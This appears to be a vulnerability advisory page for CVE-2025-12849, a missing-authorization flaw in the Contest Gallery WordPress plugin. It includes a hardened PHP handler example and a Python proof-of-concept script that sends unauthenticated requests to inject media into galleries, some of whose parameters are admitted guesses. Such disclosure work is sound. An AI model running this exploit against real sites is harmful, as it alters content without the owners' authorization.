Security Vulnerability Report
CVE-2025-12849 CVSS 5.3 MEDIUM

CVE-2025-12849

Published: 2025-11-15 07:15:43
Last Modified: 2026-04-15 00:35:42

Description

The Contest Gallery plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 28.0.2. This is due to the plugin registering the `cg_check_wp_admin_upload_v10` AJAX action for both authenticated and unauthenticated users without implementing capability checks or nonce verification. This makes it possible for unauthenticated attackers to inject arbitrary WordPress media attachments into galleries and manipulate gallery metadata via the `cg_check_wp_admin_upload_v10` action. It does not enable an attacker to move or upload files.
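The registration pattern the description refers to, beside the way such an AJAX handler is normally locked down (no `nopriv` hook, a nonce bound to the action, a capability check, validated IDs), as an added illustration that is not the plugin's own code; the handler body, the helper and the parameter names are assumptions:

```php
<?php
// Added illustration for CVE-2025-12849, not the plugin's own code.
// The handler body, helper and parameter names are assumptions.

// Vulnerable pattern the advisory describes: the action is also hooked for
// logged-out visitors (wp_ajax_nopriv_) and the handler checks nothing:
//   add_action('wp_ajax_cg_check_wp_admin_upload_v10', 'cg_upload_v10_handler');
//   add_action('wp_ajax_nopriv_cg_check_wp_admin_upload_v10', 'cg_upload_v10_handler');
// with a handler that goes straight to the write:
//   cg_attach_media_to_gallery((int) $_POST['gallery_id'], (int) $_POST['attachment_id']);

// Hardened pattern: no nopriv hook, a nonce bound to this action, a capability
// check, and validation of both IDs before any gallery metadata is touched.
add_action('wp_ajax_cg_check_wp_admin_upload_v10', 'cg_upload_v10_handler');

function cg_upload_v10_handler() {
    // Dies with a 403 response when the nonce is missing, wrong or stale.
    check_ajax_referer('cg_upload_v10', 'nonce');

    // upload_files is the capability WordPress itself requires for media uploads.
    if (!current_user_can('upload_files')) {
        wp_send_json_error(array('message' => 'Insufficient permissions'), 403);
    }

    $gallery_id    = isset($_POST['gallery_id']) ? absint($_POST['gallery_id']) : 0;
    $attachment_id = isset($_POST['attachment_id']) ? absint($_POST['attachment_id']) : 0;

    // Only accept an ID that really refers to a media attachment.
    if (!$gallery_id || !$attachment_id || get_post_type($attachment_id) !== 'attachment') {
        wp_send_json_error(array('message' => 'Invalid gallery or attachment ID'), 400);
    }

    cg_attach_media_to_gallery($gallery_id, $attachment_id);
    wp_send_json_success(array('gallery_id' => $gallery_id, 'attachment_id' => $attachment_id));
}

// Hypothetical helper: records the attachment in the gallery's stored list.
function cg_attach_media_to_gallery($gallery_id, $attachment_id) {
    $key  = "cg_gallery_{$gallery_id}_attachments";
    $list = (array) get_option($key, array());
    if (!in_array($attachment_id, $list, true)) {
        $list[] = $attachment_id;
        update_option($key, $list);
    }
}

// The admin page's script receives the nonce via wp_localize_script() and sends
// it as the "nonce" field; wp_create_nonce('cg_upload_v10') generates it.
```

With this pattern an unauthenticated request to admin-ajax.php never reaches the handler at all, and an authenticated one without the nonce or the capability is refused before any metadata changes.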

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WordPress Contest Gallery plugin <= 28.0.2 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2025-12849 PoC - Contest Gallery Authorization Bypass
# Target: WordPress site with Contest Gallery plugin <= 28.0.2
TARGET_URL = "http://target-wordpress-site.com"
GALLERY_ID = 1  # Target gallery ID (enumeration required)
ATTACHMENT_ID = 123  # Valid media attachment ID to inject


def exploit_cg_auth_bypass():
    """
    Exploits the authorization bypass vulnerability in Contest Gallery plugin.
    This allows unauthenticated attackers to inject media attachments into galleries.
    """
    endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php"

    # Build the exploit request
    data = {
        'action': 'cg_check_wp_admin_upload_v10',
        'gallery_id': GALLERY_ID,
        'attachment_id': ATTACHMENT_ID,
        # Additional parameters may be required based on plugin version
        'cg_step': 'insert_attachment',
        'cg_override_gallery': 'true'
    }

    try:
        response = requests.post(endpoint, data=data, timeout=10)
        print(f"[*] Sending malicious request to {endpoint}")
        print(f"[*] Target Gallery ID: {GALLERY_ID}")
        print(f"[*] Attachment ID: {ATTACHMENT_ID}")
        print(f"[*] Response Status: {response.status_code}")

        if response.status_code == 200:
            print(f"[*] Response: {response.text[:500]}")
            # Check if injection was successful
            if 'success' in response.text.lower() or '1' in response.text:
                print("[+] Exploitation appears successful!")
                print("[+] Malicious attachment injected into gallery")
            else:
                print("[-] Response does not indicate successful exploitation")
        else:
            print(f"[-] Unexpected HTTP status code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-12849 - Contest Gallery Auth Bypass Exploit")
    print("=" * 60)
    exploit_cg_auth_bypass()
```

References

Weakness: CWE-862 (Missing Authorization)
NVD record status: Deferred

https://plugins.trac.wordpress.org/browser/contest-gallery/tags/28.0.2/v10/include-functions-v10.php#L42
https://plugins.trac.wordpress.org/browser/contest-gallery/tags/28.0.2/v10/include-functions-v10.php#L47
https://plugins.trac.wordpress.org/browser/contest-gallery/tags/28.0.2/v10/include-functions-v10.php#L64
https://plugins.trac.wordpress.org/browser/contest-gallery/tags/28.0.2/v10/v10-admin/gallery/wp-uploader.php#L15
https://plugins.trac.wordpress.org/browser/contest-gallery/tags/28.0.2/v10/v10-admin/gallery/wp-uploader.php#L173
https://wordpress.org/plugins/contest-gallery/#developers
https://www.wordfence.com/threat-intel/vulnerabilities/id/e000c4ad-43ec-4ad0-89f9-74e9e6d8b917?source=cve